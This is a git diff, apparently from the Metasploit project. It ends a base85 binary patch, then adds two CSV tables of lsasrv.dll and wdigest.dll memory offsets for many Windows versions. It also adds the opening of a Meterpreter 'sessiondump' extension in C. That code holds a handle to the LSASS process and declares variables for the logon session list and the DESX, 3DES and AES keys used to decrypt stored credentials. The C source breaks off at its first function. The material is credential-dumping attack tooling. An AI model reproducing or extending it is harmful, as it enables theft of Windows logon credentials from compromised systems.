zV6QH%sx7uPIE$)ox1BrIbH$rWxyrAx*EyVE9@O1);<b?3*g71XFJ(@sd90e%u~p~9
zm&aRVbD~kO+Z@hyDnsU)jroi67hSuuaIq=xD^kN-yQ~uFRIysFDp(=XvjPY8JC}Pd
zaLZLaeKmg94##g^!Q$M7D+}@#U0ZDaO7tWJ%GhdF0IX_R1?YkW%5#(-r^g8CEuOa^
zFSq!75?l;w--?vVkj~%~gEITo=~F9htgfhYR5>eaP%>+(tTxA2l{v*c3uT_iiu{QT
z<xgIJ1iw>b?XN$pIPVAAZ&?}84^)=cSK8{S>8oEct$y}wC<3!Z8%qgITU$Sjj=bHz
z-da^*t9KSu)jRWQoxCQBUTiqsxqnk#4XTF$|21mO{YwAK>TQnN(i+<cA%^Cg$6r=u
zue3P~7IZ;t>m1e*g0bm;*B8yAB+f)0Y7e6PI0>65e`3On&afVBFSVVpP;<xFvRa9p
zT_Ok9B1EW0Cyh)br<xcWO5*9)%&)GhMQ115yb<Xj0~HBGsCeLC;3A!f5$0B}EU2p>
zPtpgqqH9Hw`WZ#WVIVJt+&WjSb8x;!OdrwK)dr=`!wD3q9p}S{xkEh#b-tkUx&8T(
z;2p?$rSH%EIruVnX`ZQQW!|FVrReVkp+<~X_%j=e%!54x-;w=0Y}R@+>KCsa)2|`z
zJkjB(<uPJ7NxI-VCD=BaEh;W3G;ll&ym188c-L2LU*xQ=!Kl$%Kd-uuMni%@xXln0
z3T(9%&Pw<|4>yv#AH_ho%Bt<$r_9LUP-<Er1N;ReKmD3OsGHL2%FAz7{SGVrHL~B8
zX&N#71ZNuR$_>s+o1vVB$^M!pEvp4%^AJJYMnO}jS^4P7KQ6#f*Hm47oy|c=;)7XM
z1+@a#tM)`Kn=nDFS=5J>^`b7Vq%_H6)tZ$wLdH&_1LIFyJ%)2D?M{cVg!@pdayd#>
zJycT_85HZvGOAr13H*%U&eOArk&kFU;m_axfUwj+`P(Pe>~Bzb^Ti~c47IMBRT%fE
zY^WytceamzqcH_Oi+DOzjFN)9rwO!+D*xwJ*VWso(qqQrM+O?z9i8>i^1?ul#z%|l
z)Tj+r^#(h*#)d`;eGH$X$ezYf=P;Dk8eFxu20Mnd==N+52kh#~%3Kaq8h?^O>6uEM
zrTMjDj49JnXIU8FIZDf%1}nT6${lqzYBER`9S`~-3^83pn|$Ia(Tn(#^XHES12X$O
zSIcTkS5@28Nm^xTtraFvk^4a|`Q&bfp|}!xE<?^RuPY^M1gar_Vm@amEu%@`4Dbat
z9Fiv}^{7Fnk;+N%Mi4zjz4#|nU5$Te{#8n&o??XZkLDh9x6V-i*$Q3`D~i_DJ8d<y
zGBE1FB0V=a>gxP8P?S-P%{ge^JJc+EVKo(hvsn%PX0v+ysh<_2Wcs_588BuRe+IwJ
zI*j4z57OcIo5}5GN*l&3u%pi?A?Zzg%xOb9tDsX`Gn603<7;3u)P6A^q0-zy_$~sp
zW6V0#r;)iZW_AH{L4XC&S98oLRfsgeT#HcZXGAOx%mw6f05B|txr~pw$<KWFT?HE#
zx2GJ6Zvo7;LAD}4D*lWKd~v-a$CL6-c!~5WErAEotCV9W@DOIAhDewEQ92Y4&5&Hc
z#41C;65o7|eZa05n3J#iA^xrh9#)?7!7jz{Z42^E^P$?HutjhmY$iO^bQu%rVSLBq
zCo{!I`Ji|RZwe2-GS9B5nO*N^C@a284Tbm&q*;d#z7Vc(rqw!A7%X5LqhK9|alVaO
zdhQ87i|W=4GB3vbo}7zpc2ox8(dephQ7^Z^Rm~$`fM%1z8|{uNDucpOM;Xnn=$mg_
z<#3fc`~|$Aw3Zu@E~Ui~KgG=uC&dR<i}33xE{cc3GlXG9rI>wN;XrXZs-zBdsdPE&
z{U*@MX05daSrog3sj#k=`zmrtSn8yBC_IH>@W<eX!JU#|sh}=#cr_E<O=_*Hx*A#t
z9z`%L_~}__1d9mKhvntvh0}L=I_e_@G-O$pM{3!X>FL*7Aj4%a&>0D)EvYQQ$5?~C
z0iPB=SR~VG0krrdBmdgxYxsI%&b0#O);aPTs%T<P4K+jktw$}Y11H+>Hv=3+I0n9O
z>_5c>j0~cN-C;rI9}F?K!mOrE-o8D=e9sUwq?ZQyheXsM^LK}szc<88PZ9*DN6!`n
zn@JoX3aT3_7V7`{XF$I&_%9W_DgFlAk8Co7Q@`r3i4Ff7?0*9b{At+v{RPLckp=!j
z*!lgb;SK-Siy!$PUapn@(;T4L;Q!N{=ckq+!Ht^0Ux?=X{?zcpbN~0+{H+>5DJ9@f
zO_59iy&m^}{5{`L|L2$6fG<4@=!H&$-X`!hZrJE<+I07~np-w|wzPixp0@9N_j~t#
z{|7(Zdf$)kf8fD~e%!w8;YWV5{n5udI(O{c_0ymIeD^ON|K$_Edh)5Rr=R)tv(G*M
zLie5*_wIY?<^2Z^9y<KWt4EIZ96SEn>u<dI)`_>@dG|N}@!Q|^{{Fo`y#K);|D^PN
z=>6!=AOC0nC!c=y`Cm?cF>vb3(`Rs0k7+_e!@?sXwNcSAv2mkx`uNdf5)#LbOG+L;
zVdA6<CL5+)I5lP3Mc+uh_>#0sr_Y#~ep$w>%*(I1GV7|@*>kSGW^PXDsxqssyrQz|
z*45QDwRQH}FmZRSS=+Gg_M2ARe9Ov`bGv`@jyu=i^{>wVzdHSYnEu9jxu(4N*P8Pe
zEG#HowAiv_X;CpmcbDIAqoDt}-Tzn6{~u+)b7$|o*pEdtHs0O1p%DYX(7PM&-q@HB
z9*z;<rcIkL@Jdf_v@|v|Eld4ImgV|JjPEcAv{;%^dkv|L&5a1fFbu4$tkh~F8|?PA
zcKfjLAI*qrF%zi5NY940pJrtaKHf7RG-Gjmca!D=1(*vJ;V;;a>Pqv2e9ZZ-J%=mJ
z6BlDHVdTC>j)5n~ma;2YI(8Li@sy_{J|nOb^Fx{^8ldX%OEW{lw~(h?03D4|X$Q!_
z%6SfIprbvPD)=;Du0^w8G0UWRB+YqgenmS-6)@HEd07>ovj)c{c9@7hr5N{CvD>9T
zniWNZDr)@X&kFZ4?oKl?O4EQjC(RcPJRJklt>dYZn;m}?qX<z2ms*Uk4WJO^Qea&J
zTbcnIxX;zVU*JypqMXvGydE)Db3b*+IpI#2Qp_S}H17=1X*#D<4brB$GR-9o=-p?+
zwi>Zr3{yGctA&~JOgIJ8lX5hiQnegM;v@=1a|MI^4U~k5<3zJ$!fS?~uhjC+@RxTj
z!cvZD*NmuDfxH@!f*oPYc&^K3?6k)ya!a(Jc!f(1e5%+7ICL<7UFJ`3Wd5Sqs(37F
zxl<Y{-E+aG#V}L(P#FjpL205H;W^{Kg+J8%sB}yB=R?IwrQb+7u=?pPsKI1?%V1gl
zc&PMC!MDU6YHb@SE(7O5;$syjic{c~!LIbjr{Z&d<++w~ohZ%0^dGrQ)%33TFQi8`
zi|Q=3C&P32)#+XCPtOh>6+Ey8v0w!rX5yKVYLZ$v0~Ay7&-BN4{`6W2%xMj*0qHtX
zhY4fVL?x$|VjwlOd@f^G`O_Pzyz5Y^R9>Pbr21Va`GHzk$|rGnaJ+;0>9QgGL|9Rb
z)INwdhuSaVov-Q(0{nDY5I+&V!{e&~)u|OEN>uXlDCKRNXd_miGaW(y%h2mkZm7RG
zfBFwjiPr9j=7XuC#viDsR4UYJIMMD>drNW*)LYPss7iCuf)k|%$EKEFdQkbDKfV;Z
z;8Efm>hG!NADn`~H$ABQ&Od%yaiuj|HRk#uaR<sXodw$aa+F&grybQn>MQLqlb(73
z>fNZP6ch`TjtE2CIG9E_MZv$GD6yWUuJzcZnbvyf(@Qhotc1B+EBxb#0sl&*8HW$V
zC(Wa!ad)KfKSr7@(wrpCy%EAaS(@9VdAu|mq<Mlg?+zFKaY&kfCDMF>G$%<j?s?{)
zB~17?NONzfFi(-@evL3UNb><{Ru@J)r1^H~-Ym^$q`6U=aT=I^CDL5T>pqPTsZA*7
zWpo|vsGLNrm&?-dXFyLtHI-_l7+DrTM=S8eB?60RIkuz(X7E3}Z;i61*ekeC8pBa<
zBx0cWRzuaXwfMyW9(+Sn$wN3Xew~8Yqp?OB9NTQfCqC@o$u-XFt7@%vYm1y*z>LA3
zL?9Ngx)s}U`L*SBjvDT8eIQ&xX}!}}=B!#{v((vLc7J@rPDIBFv3gosVVhUiAVMy~
zI5iL0&I0Gpz-SoHV(@^u7#A;sT88mNicI6HKypeX8*N?2MrRhY(HaYjLHfOm8MA}&
zlcz*7U1lcJX=X63J+dUiBHT(ebe%~A(_x!aml?%$OJnR)kcc4xi@`W{cSoFtO$iTS
z;l<iPcA7*jOLWGtM1)I3xWuLL-J0>yY&`77!)|<W6dRwZW#gBQ?WXuFVBV*(0Q?HY
zrww6R>y$xu$rnYjB+XbB+aKMl?TP3PvxlaKNF3V{UXvWnk~8%z*^$^krZ>Jv*Bxh%
zEs3#c5|Q?M@%_5qxSp8qD7&^K(h`vl{}CZ9VrfV^rA_Y~UIAqvg|xBi$DGlF?JkIA
z7rY<Fl3x#J3HxH04(`#wKOFc6hm~=b@H97$kmkf#HW8PqOe_Y>jA0WqlKRK?CiIN%
z*4s4`qS*xJC^iA^6Eb7j1P8ab5PteOp!L;|+tm?%LcbDbgEW)=BdAz1>%*A-{ohw;
zogY>VvL~8;-djQO_`{OjzV|AE<4>Lz!NzF*P!Z7+RuXCnNhkj3zb2HYYoE(lZ4P4(
z$aG1cXT+VRWKN1;NuMJw=lc~}>qixX+$f#b|4<PeKKY^umZ15dBC<EUTTO?}4Q0vG
zqSzSl;TX-OEVd`QJD3;gMHI@vArHsIpw3Xb(P1pw8i}%q7-Y}OA|r(JY8(7+gKAEM
z|M)P5`%GE5HG&1(Ymzi9=|%8GLKI7QFRnkPH>xMHJKPQ`a6Z%UbRt-EMua_z^EUV!
z=_VrG#EkfE`*MT@ZtpB$?4E@}&*3;N8|RE=<E$}kTxK*I=g?a?uUf}~UlUpK@zMSI
z-cjALcJOL+2*sbSLB4dW5J!xL#Slci^bLby8Wx65C0>S8aj3cu2gab%kBe{uU(`b@
z>H>I{>Z0m5A5F{{;C>zaj-xynVwu4j&kV(SX2=}H433HY<9m~O#&##zH3?dlV1+7<
zWC_T3LWbU+JTr=2;QST4!1@HcAoG{(0?lrwm-W&fPPn0bG9x+N)HE--8FwQ=IVFC{
zleJ8bx~q2tN}TvE3+TsFy+)l&Mx9Fr{>i{Ud1+#g8dqB>+I`SSjZ3su)Rv*m%80SY
zQ$5cJNmu=!wjs`Pl#xtZ;3vwJ{DdIQm*L(6wL|*(0Qy*L+#XWHj0ppeMzS#(I=dRC
zx)P75K&fGNLjN9=8iq=O$}f3F6q{t-$0lX&Ws@||Gg0!Qt?dQ9G*qU@PxAD*yvfed
zXb<ASH+nWEchq;I`?bBOm)&Z+XQnuL+Z>Pl>Y46%j9o+g20D!^1_X}dGRDZZMUS|2
zXj{<6d{?wBoDb0+C!;-1Mtde{+pWPHJh7U1j<05NESv0%XOpdZHW^_jJN#{y;A1Dk
zfhUr|6Um@?az<jeMi&;K|HNptc{;Rrqu9hiSWY*hhj#;Gr#3S7fuyZwBHBe~657ad
z2s4&V)Qo0{y<>XfyOCGUf6?GS)KTz3!cw%GlVaH<<Y5x>FbVdPU_U7%xp!O-;X(Zt
z+H2H1>bFFG<A850@I}61kN%>Y*KOcVbzA7QLLV8zA~p95IuNa)qNsf4p|7C20`ptg
zbc}988~vJqD7VWeI|Z%BA<tuGjdBbvH*`O;+;qTg6w^Hp+(u|q;)mP$`Tl-vR=y3D
zfpqE9j0$0+GNRKpqa)bpePh^Yl-cOxF%}*N`Wm!Ry}F*b?ihP?iHiHd2N?S+ltspo
zd_@eKmU&y~G);M^zJFA2pf(ErG+@B_Rq@4bXKXH%8XxCn&`P$&=^Q#j(ur=GM6{dW
z*~G_3+2cxLEt(`PO9CGyfsc|<7D*Wi_T=;!@SK%R*4)TO!skE;;?YMiJ?e=5@u==d
zdxT|Z`TWPzjQt*p(&SLI2bTD8Xp60*P)Fj}xTRzIRqCj;as3*X4L-|Qm81=Chl1On
z48fJE|3AX-uICv0mP*U%F{p1#*o0yW>fB;BL9>8~o?g&0hj0((PX~B_3KAcu54nLB
z{&tMFgQ#mx)HU=wvaa>2>A$#-u|GgPsPY4DHIG__xM*Cl5B1&|G`9F|f+e1(jqx1n
z3)KxZo@@3q_Bd46pnRjgpdRu1vJ~Sh)JF1;EU+&RFm}yB#$J>D_rOd~l7+s`v%-=u
zK>Xhg>P_XCg122%mo|c@czc1oW(4pkI|}&$s0(B~@$nHX9`!XoV=xbU;b&$K`ij5d
z&wY%s$DmYyL}UGD=p*NASbLs^m7xE(C#xkOaQ|DsyAg)IE(s4w*el_u5=P5-QzV=x
z;dR5(qvItMqa9~}Y|fPs%&V=h;a1WHa+52a)oWI|s<?Qiw6#G3lB@$ERev~0Q&o$u
zOO3G%vgJ<ON(dI(>uT${7?q3z!f8BaF1xzYAFiyfrUoKw2vGrPQ3%&K7*p*a8>rd}
zK@>v$pZIl543x(LoN?Rw9%BcB>^_BE7wq)o1O7JC8OPp{k$7UN@b~q3P(g>U&w~m&
z{QrI)G>$=5e2L5ESjP{98L4()tzv#vwG9q*zJnGkj4X5nTRQt?WY^^_Ey`cKh@Yg0
z!+AYA+J!@bPDkB3ob95XK-h7~=V9l7NP0{S!;kK;3#HkAJd9l?ZGsMVF@v-d>n;4S
z7uGpMOd}pRV!<baZV6S-r7nVqGp+V;?95yMm#y%-@>8qK6S~;tw7Zb2Rj!I6-fDtQ
z+7P5oYc_c#Va?ccbjD!Bv#c2Xhss5vSs6UR9|p`K3AQnmuvW$6UJhM~^P<uuB(vFD
zA!b{teLlqS8LQL~ET~%LAd$ptLJM%3P?~_*Yuu-?8s{U}62ekOMB%Zc8f24iWo##z
zWm)Gn7}=XVv@AjP1~-YEF&qvjA--aq1t>+x$=syk{L3(u&$3z}#B9xLD1)RW*aw_M
zUBi1Cq>@*=rpi%QTLZ!M>q;F}B>8P*3-gvP$}5<aA&%nAM_zEoP$16=R9ubXm;_@_
zgf1<us<-*0XY4S=oJ-Q}wGuPR)lHiD)%8G#b2Zz-{fO?WpsE(BP77P=tX@{T7K?Ow
z4XlB?TZq+JE$NN97K~je^~HIGq>l~FuSZ-}*4#R)&4Lv;_A$fhOfuA=zeNsjq!bZA
zq<90FcwsdXU4r;zIl0LEy%%;)g0T>!$T_aU=CBB9e|8aJeO;Bq=_-}TqZG)lpssGU
z%RV2X_(XGldWEqha>*^V(_z`%Iv@#FKTMLcL0BINE4Ddms%pWwYC*D>gD9$68p5x~
zvAx{NQb%!Jp{v?iHE*5M#%6{V<QA6NMV-KEK~<>Vt+-ANz~1FN1S$lrdtx>m#CKRH
z4=bv+L4NiEvK5t6)JDX52T@R%_@OAqR+FzHr&U&1T;}gTd~3_aIm0TjP!SedK?`H8
zwa8voD*}E=Iit3%c%9wGZWXbVf}D0j?Rs_`)Ty>PhsME@16Wb$ML4U6dRD<}VGvUb
zI@Dj!eoyI)<iI*Zd1Gs_IrtKAZ5c`i$6>%fKcX~>tIAf(JnkP}3SjI;jx!hHFRlU>
z^*lGwVWpPSgvNA~JJ2mVw7^!nW>{v}r{G+qID}AGCm}jhd@4(`%<$_$O&i&<c8(85
zhIQ38su7O|nNeV9mEPgyywoO`+Zfy`0h{r|X$aeUDb1jgoF!5OyHYyWv)>5bK~IBq
z8QH=TI@hzCQIA~pm1GbHx$1|G?Dnp9E+M;%Qb^hp^A4%BFegA6plF?s)(qP-v0e%D
zO;B}EG}8)Us4+OZ<XB^Ks7IKrt{VG{hAT38Yh|+0$?ziXA+Nz{tEK*uA1xnhx71c%
zP5ijVMol$J`|IytO97w!R4mdL47tzZKZP0V(v8Fo|1O{MvA`GW_WxFRpHT76{rAHA
z--R!R;+gUA@220E#@MSj8;+Oba;%~5|6H^FoS#U?aL(_ai^snzwsQ*u3yjV!&H1mw
z_@AHdIaxq2(mE##82<UV{4a>{-<&1%vxFRoCL~Nt)cgqsS0x+QZJZ)W`{?h4X4`fF
zH~hHw4C!*#H*(kk|9c*J=MjT&9`?K8tgy<F@K@*Q-zfb*3I9hQe*fX|?1P7uhi^J}
z{Oh;z5KF=tTk_5=?-<z1cW!+rW4Qm<PW-m_6l0gI7ntF;N?&e}uilfQ-};S&CnS7b
z!X61<k???o-4b?5xLd+@3EL!WlCVKSr-XJ1t0k<I&?;exgexRmE@82R76}U^G)tHx
zVY-AV5>Av*jXyz}V<ileaNsY39{m#bO4uXe0SWg>*d<}Rgl!T=g^4{6mDJ7BzEQ#k
z3GEVAN?0P{atX~6W=WVTp<cp)&jr4Uggp`-kg!|AE(v!_*dbxNgj*$SldxIBMhP1v
zv`bhbp;^K#2~#Ch<4=-it%L)g34D7c?2)ib!gdMom2iuM4H8-;%#!ebYK&{j677as
zo<rfk+Fi{2hGG>kcjt_Zzx|Xb4|Z0-MxTHdnO}Xj2<L~g{iJCK#ZKvtg$j`h%@@~$
z{aF$enkPs-@^icVTxlfqu~5|b5+wOUf+TlHZgh55b)$GGEI}O<r9qu8*^wOLXsO7a
z+HbPI9E!|FX{NT0%$WG|FiWL<k%XAa^Z0K7q_nH0eGQ-i$__OVie|oqYXlVG(+EX4
zZ;)^!Ai2At$h`@Q@c9nZ#ZV7P^EN=j=O<8<-eXYY?<pwC(-A0ge+!D-lRy-r4=JL{
zfNZA}3FUOq*Qg3^!q0!lrx_CIQ1cLH&KJRU|ET}JH+*o~q#qjoZ<+tu;fKcef5kil
z86~B*Kf7f+w0p5=SN>6Wm;9cP@jfBr{d=L>4mwVY_RlGy;l{!3rfSv%GmxAKd{voJ
zoemE2Res5h{FD0n`<en@Q{cZ&fwqI9KL4{I)nRJS)Vi$JQJPoL_i3I;@6P!G-Xq~Q
z34bZ!OA@{%VV{JjB|K-2(bn96fr1_~<t2c7FbKL7`W`^<7~Dq#eLvuY1dLH28yqat
zPO|OCFgU4%AA)~^T2B4}Pv9U%8}z+^xft+}K3IO8<k;sJAQuFCf;T~RKwkp*o2ii1
zrm%pU(-;eb%y}E&jOiFVK_4tnPBQ6BK|nL?3EH7Dp(l6`R0@R!+=6|L2Iy&jV?`G5
zfxZN=9*XkS2-q$4`l~R9he}O=AHdi-kXwWQU>WdW8S!8la*{ERf(-cQ@K10m)cepA
zTnP0#^aLxR_CX&k?_HY{kQL7}GWN@P7(YVJnc$zHRzOcM27}N7==Fe!*t2;8`e1o)
zlKZ|L>V4P~+z9nL^ue;+B<uYlRDxc^A^41iL4Ov|H6J_xedV=`T>@F{Oz5#Mz#f4r
zfPOdN?u968(gQ9j5OU+ifGZ0zR;93j^@|zX3jG~`zk?##a*|p8D-_Y32GLhT?S`Km
zKr2)i^aSsQ>W01<@E{Zq3+RJ70DHCs`=L-|PcRz;anjEL+za)2JkkO@gn@Yv{PzPc
zT?W2{-VXRYR4?@1fTJ;JSD;S-oVgt1VuVcxtbw9<NRF@OM$m!ufM=jA&=dS<1@MNR
z;G;Jq@6dMuX59iF13m<QS_0mN{cgZ-uR^&)k9)>h7ZlM!DPyeECeot)!(T&DUY-TK
z406?BqczL~SOrD?s{yA}fVW|v0@wjXyh`vDC<;r^SBWx$9~=x~*Fced4&WZC?*(kT
z6$*Z~0{&q&_93BvA26|6q?H8tEvTL`C=0+xp`L)Ben5SV@Ix?N>ItraqO=+S=h+#1
z7XD3u??Al|ebQ}=eGEl>(hoS_A>uIumP>sl;9u%N6Zjth{H+t^0vvh)7r8_`U;*5^
zhA{)|31+MnbjSo;-+(fJeH-AuZ!(qxJ;9mlaaJDsbifiQ$_v5Yk{R~BfMs_Hy%n%e
z>OTUU)+q9o3V4mwF9*C|>K_0+3e|vkdH|y~2z+7ze=YUT0xonT@9<Lz_-!bnRU6={
zyMYhvt$=Sq5$~M<)HVzH6MU-$G=!fMfJZhnRA8h9xX**~fS%wPDB=f#nOh`H0K>j5
z_%;dfFjOY|^a6(61NuO(2TX-BL!S<K8B_uEIe<ne3-mpJ@ol)T0Qv+#$9J$_4!slb
zQ>X`^{~WO4yJ$0^C+LHs`jYfL#?C@@!=BxXa)2T{31)0XU4lLnupNrp1cE#66ZTI4
z-ufd!lWM?c?uQ=!p9Ng<fQY9U@X7~~AJ8)ka4ROo>Ch8gyB#<aPXZo>;&lWt?NPyd
zxbL6gE`M%MFdK^M+8n?iOZ#@fV^W{f0bYe7Kb3$#g`)bt8}JLM*LR|hLv4jU!H=OR
zzuFzBr#nF_*c0r9B0eN|(Jskjfa{=k!OtClQ-3OWG6nGHQ=lR2PXNYr3IDNxpF_P5
zdxHC)7PLA5=p{YuKLU(;M&=8!_F2@UvFQ5%_d*d(_5mJw4&@H}9>70AQ63YXXY96a
zw7IZ%0zL&r_FaI<dqmiYfIoz4ho5f1Z@q|eguWec*<R2B`sIKj`_Lvp9|qU}Mez`v
z^b+U-do$oRs58+21Tc9&%5)ssI=~}P6QS<`%s(LVSOB;cits1cbP&7+KMw%D0Y&kj
z08Bb0^aKsBz#se&+zv%yI{??dD)jdP`lOx~QF5Rt9)jP5YDZYS0l^-U_U(Y<kBai0
z2)Gfd1AdwSZ|Xt5pkD!)bWHdm_%77vu>TF<nByW{I*&x>j1rJ{f^=qw^aSZV4(SQf
z85+_Pd`ar*9L)z(PcZ5=;fKy$&>0BwPms<Yke(pP?vtJ%$>o!tAj!y+o*>D&lb#^S
zu#=wPX{jeUc9KCSdx9iCPI`h%q@I2K{qLkeFUks-=^sgY#PCSgBRP-2&@a{pOCGCy
zjAka8u*%wD-m!c~<&K6O%{#X4=-AP<<G_v+JCq#*JG48KcBbyk+G*aod}rm(hMmnj
zSvtlL6lc4kJ+=KrdvAN&wyoQ89<y{T?<nc0?67w<bToD}ceHhE?P%}l=-A!S)zRH?
zprfbbL`QFj($U{B(7`&jo%+tCPD5vEXL@H=XHKWN)6%)Tv!t`K)85(8+1T0K+19zW
zv%Rycv%B*^XHVye&fZR?v%hnolkL#%(C<jvVc3znBYj8KjvU}_0rn-p-;NwKA`flI
zMLY7b8#(DlUV4z5UgW1AIbu7t$j8>5T{}<g9N3w)%d%_vu997qyX?Cfb~Wx|KhypU
znajbr0idhByZu0W56`92-rqjZ&bDc{C2ccoOWl^fEo)oOHuE;iw&mMOwpDJkZ)@C^
zzCCMu&UW*5%l75lOSV^Tw{LIQ-oCwK`|j;s+q<_P*xs}K#P;6pi1_R8YYO}iP~iUo
Df-iK%

literal 0
HcmV?d00001

diff --git a/data/sessiondump_lsasrv_offsets.csv b/data/sessiondump_lsasrv_offsets.csv
new file mode 100755
index 000000000000..9a28b8aec9db
--- /dev/null
+++ b/data/sessiondump_lsasrv_offsets.csv
@@ -0,0 +1,65 @@
+5.1.2600.3249,x86,70899,654432,654932,658392,658400,,

+5.2.3790.3041,x64,186528,1383104,1382944,1390096,1390104,,

+5.2.3790.4186,x64,186640,1383104,1382944,1390096,1390104,,

+6.2.9200.16384,x64,267596,1156736,1147248,,,1150304,1150288

+5.2.3790.1830,x86,98877,739736,739616,741312,741320,,

+6.1.7601.17725,x64,70032,1365056,1362136,,,1361968,1361984

+5.2.3790.1830,x64,196656,1383008,1381472,1390224,1390232,,

+6.1.7600.16385,x64,69808,1364128,1362208,,,1361536,1361552

+6.1.7601.17725,x86,294241,967384,966680,,,963224,966448

+5.2.3790.4530,x64,185072,1383168,1381600,1390192,1390200,,

+5.2.3790.4806,x86,117221,736816,736016,737480,737488,,

+6.1.7601.17514,x86,294241,967384,966680,,,963224,966448

+6.1.7600.16915,x64,69808,1364128,1362208,,,1361536,1361552

+5.1.2600.5512,x86,65004,654432,654932,658584,658592,,

+6.0.6000.16386,x86,98368,1147544,1146720,1143272,1139332,,

+6.0.6001.18000,x86,105628,1167992,1167192,,,1163748,1166928

+6.0.6000.16386,x64,95424,1579584,1565888,1576624,1558160,,

+5.2.3790.0,x86,81886,732456,732976,729608,729668,,

+5.2.3790.1830,x86,98877,739736,739616,741312,741320,,

+5.2.3790.3959,x86,117077,732720,731920,733384,733392,,

+6.1.7601.17514,x64,70032,1365056,1362136,,,1361968,1361984

+6.0.6001.18000,x64,49192,1608928,1594528,,,1603936,1603952

+5.1.2600.5512,x86,65004,654432,654932,658584,658592,,

+6.2.8400.0,x64,287836,1156688,1147248,,,1150336,1150320

+6.2.9200.16384,x64,267596,1156736,1147248,,,1150304,1150288

+6.2.9200.16384,x86,391151,930232,929576,,,925956,929368

+5.1.2600.2180,x86,81691,650304,650804,654392,654400,,

+5.1.2600.6058,x86,65091,654432,654932,658584,658592,,

+5.1.2600.134,x86,76061,588916,588912,586192,586252,,

+5.1.2600.1361,IA64,,2031872,2005704,2005072,2005112,,

+5.1.2600.1597,IA64,,2031872,2005704,2005072,2005112,,

+5.1.2600.2525,x86,87746,650336,650836,654328,654336,,

+5.1.2600.2976,x86,87113,654432,654932,658392,658400,,

+5.1.2600.3249,x86,70899,654432,654932,658392,658400,,

+5.1.2600.3520,x86,70907,654432,654932,658392,658400,,

+5.1.2600.5755,x86,65012,654432,654932,658584,658592,,

+5.1.2600.6058,x86,65091,654432,654932,658584,658592,,

+5.2.3790.134,x86,81886,732488,733008,729640,729700,,

+5.2.3790.220,x86,81886,732488,733008,729640,729700,,

+5.2.3790.3041,IA64,,2108480,2104832,2122880,2125248,,

+5.2.3790.3290,IA64,,2116672,2112928,2131008,2133312,,

+5.2.3790.4186,IA64,,2116672,2113024,2131072,2133440,,

+5.2.3790.4455,IA64,,2116672,2112928,2131008,2133312,,

+5.2.3790.4806,IA64,,2116608,2112960,2131168,2133376,,

+6.0.6000.16820,x64,95424,1579584,1565888,1576624,1558160,,

+6.0.6000.16870,x64,95680,1583648,1569984,1580720,1562256,,

+6.0.6000.21010,x64,95424,1579584,1565888,1576624,1558160,,

+6.0.6000.21125,x64,95520,1583648,1569984,1580720,1562256,,

+6.0.6001.18215,IA64,,3203904,3203872,,,3208392,3207056

+6.0.6001.18272,IA64,,3203968,3203936,,,3208464,3207120

+6.0.6001.22376,IA64,,3203904,3203872,,,3208392,3207056

+6.0.6001.22518,IA64,,3212160,3212128,,,3216656,3215312

+6.0.6002.18051,IA64,,3220384,3220352,,,3224880,3223536

+6.0.6002.18541,IA64,,3220384,3220352,,,3224880,3223536

+6.0.6002.22223,IA64,,3220384,3220352,,,3224880,3223536

+6.0.6002.22742,IA64,,3220384,3220352,,,3224888,3223536

+6.0.6002.22869,IA64,,3220384,3220352,,,3224888,3223536

+6.1.7600.16915,IA64,,2625760,2625728,,,2630272,2628912

+6.1.7600.21092,IA64,,2625760,2625728,,,2630272,2628912

+6.1.7600.21225,IA64,,2625760,2625728,,,2630272,2628912

+6.1.7601.17725,IA64,,2625760,2625728,,,2630272,2628912

+6.1.7601.21861,IA64,,2625760,2625728,,,2630272,2628912

+6.1.7601.22010,IA64,,2625760,2625728,,,2630272,2628912

+6.1.7600.16385,x86,115490,967384,966680,,,963224,966448

+5.2.3790.4806,x64,185072,1383168,1381600,1390192,1390200,,

diff --git a/data/sessiondump_wdigest_offsets.csv b/data/sessiondump_wdigest_offsets.csv
new file mode 100755
index 000000000000..829d17d1861e
--- /dev/null
+++ b/data/sessiondump_wdigest_offsets.csv
@@ -0,0 +1,30 @@
+6.1.7600.16385,x64,201408

+5.2.3790.1830,x86,79032

+5.2.3790.1830,x64,134864

+5.2.3790.0,x86,62648

+6.1.7600.16385,x64,201408

+6.0.6001.18000,x64,196584

+6.0.6001.18000,x86,159992

+6.1.7600.16385,x64,201408

+6.1.7600.16385,x86,160136

+5.2.3790.4530,x64,143120

+5.2.3790.4530,x86,83144

+6.0.6000.16386,x64,196584

+6.0.6000.16386,x86,159992

+6.0.6001.18000,x86,159992

+6.2.8400.0,x64,193264

+6.2.9200.16384,x64,193264

+6.2.9200.16384,x86,155960

+5.2.3790.3959,x86,79032

+5.1.2600.5834,x86,58028

+5.1.2600.5512,x86,49820

+5.1.2600.2180,x86,49820

+6.0.6000.16870,x86,164088

+6.0.6000.21125,x86,164088

+6.0.6001.18272,x86,164088

+6.0.6001.22518,x86,164088

+6.0.6002.18051,x86,164096

+6.0.6002.22223,x86,164096

+6.0.6002.22742,x86,164096

+6.0.6002.22869,x86,164096

+6.1.7600.16385,x86,160136

diff --git a/external/source/meterpreter/source/extensions/sessiondump/core.c b/external/source/meterpreter/source/extensions/sessiondump/core.c
new file mode 100755
index 000000000000..cdd5ba473e20
--- /dev/null
+++ b/external/source/meterpreter/source/extensions/sessiondump/core.c
@@ -0,0 +1,935 @@
+#include "core.h"
+
+HANDLE hLsass = INVALID_HANDLE_VALUE;	// handle of LSASS process
+ADDRESSES symbAddr;						// structure with all symbols addresses
+OSVERSIONINFO osvi;						// structure containing OS Version
+DWORD_PTR dllBaseAddr;					// Base address in memory of lsasrv.dll
+DWORD_PTR WdigestDllBaseAddr;			// Base address in memory of wdigest.dll
+int cbSessionEntry = 0;				// size of struct SESSION_ENTRY (change according OS version)
+
+// Variables that are read in LSASS memory
+ULONG LogonSessionListCount;			// Number of logon session lists that we can find in memory
+LONG_PTR LogonSessionList = NULL;		// struct _LIST_ENTRY *LogonSessionList
+										// Used to access the credentials
+
+// Variables used before Windows Vista SP1
+BYTE g_Feedback[8];						// unsigned __int64 g_Feedback
+LPVOID g_pDESXKey = NULL;				// struct _desxtable *g_pDESXKey
+BYTE g_DESXKey[400];
+
+// Variables used since Windows Vista SP1
+BYTE initializationVector[16];
+LPVOID h3DesKey = NULL;
+LPVOID hAesKey = NULL;
+struct _BCRYPT_KEY_HANDLE hBcrypt3DesKey;
+struct _MSCRYPT_KEY_HANDLE hMscrypt3DesKey;	// not used for Windows version > NT6.2
+
+// Varible used since NT 6.2 (Windows 8 and Server 2012)
+struct _MSCRYPT_KEY_HANDLE_NT62 hMscrypt3DesKeyNT62;
+
+
+DWORD_PTR GetDllBaseAddr(DWORD dwPid, LPBYTE DllName){
